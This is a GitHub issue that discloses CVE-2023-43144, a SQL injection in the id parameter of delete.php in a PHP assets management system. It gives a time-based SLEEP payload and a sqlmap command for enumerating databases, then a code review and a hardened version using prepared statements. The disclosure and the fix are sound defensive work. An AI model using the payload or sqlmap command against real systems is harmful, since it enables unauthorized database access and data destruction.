Headline
CVE-2023-43144: SQL Injection vulnerability via the "id" parameter in delete.php · Issue #2 · projectworldsofficial/Assets-management-system-in-php
Projectworlds Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php.
Steps to reproduce
- Create new account
- Add new asset
- Click on delete asset
- Intercept the request and insert the payload as the value of the id parameter.
- Forward the request
Payload:
http://localhost/delete.php?id=4 AND (SELECT 8445 FROM (SELECT(SLEEP(5)))pmFJ)
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
Code review
function delete_data($con,$id){
    // $id is interpolated straight into the SQL text: no escaping, no type check
    $query = "DELETE FROM `assets` WHERE `id`= $id";
    mysqli_query($con,$query);
}
The code builds the SQL query by interpolating the id obtained from user input into the query string, then executes it with mysqli_query.
<?php
include 'core/init.php';
$id = $_GET['id'];            // raw query-string value, taken as-is
delete_data($con,$id);        // passed unchanged to the vulnerable function above
header('location:home.php');
There is no validation or sanitization of the $id variable, so any value a user supplies as the id parameter is used directly in the SQL query.
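For comparison, below is a hardened version of delete_data() and its delete.php caller. This is an added example, not code from the project or from the issue author: it keeps the `assets` table, its `id` column and the $con mysqli connection from core/init.php that the page shows, and assumes everything else (the function names delete_data_safe and parse_asset_id, the 400 response on a malformed id). The id is validated as a positive integer and then bound as a typed parameter of a prepared statement, so the SQL text never contains user input.

```php
<?php
// Added example (not the project's own code): hardened replacement for the
// delete_data() function and the delete.php caller quoted in the issue.
// Assumptions: `assets`.`id` is an integer primary key and core/init.php
// provides $con as a mysqli connection, as on the page.

declare(strict_types=1);

/**
 * Delete one asset by primary key using a prepared statement.
 * The id is sent to MySQL as a bound integer, separate from the SQL text,
 * so a value such as "4 AND (SELECT ... SLEEP(5) ...)" cannot become SQL.
 *
 * Returns the number of rows deleted (0 when no such asset exists).
 */
function delete_data_safe(mysqli $con, int $id): int
{
    // The only thing in the query text is the placeholder; the value is bound below.
    $stmt = $con->prepare('DELETE FROM `assets` WHERE `id` = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    $stmt->bind_param('i', $id);   // 'i' = integer parameter
    if (!$stmt->execute()) {
        $err = $stmt->error;
        $stmt->close();
        throw new RuntimeException('execute failed: ' . $err);
    }
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

/**
 * Validate the raw query-string value before it reaches the database layer.
 * Returns null for anything that is not a positive integer, which includes
 * the injection payload from the issue ("4 AND (SELECT 8445 FROM ...)").
 */
function parse_asset_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// ---- delete.php, hardened (assumed layout; mirrors the caller on the page) ----
include 'core/init.php';

$id = parse_asset_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);     // refuse malformed ids instead of querying with them
    exit('invalid asset id');
}

delete_data_safe($con, $id);
header('Location: home.php');
```

With this in place the time-based payload from the issue is rejected at parse_asset_id() with a 400 before any query runs, and even if the validation step were skipped, the bound integer parameter cannot carry the `AND (SELECT ... SLEEP(5))` tail into the statement. Parameter binding closes the injection; whether the logged-in user is allowed to delete that particular asset is a separate authorization check that the issue does not cover and that the function above does not perform.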
Author
Pegasus (@Pegasus0xx)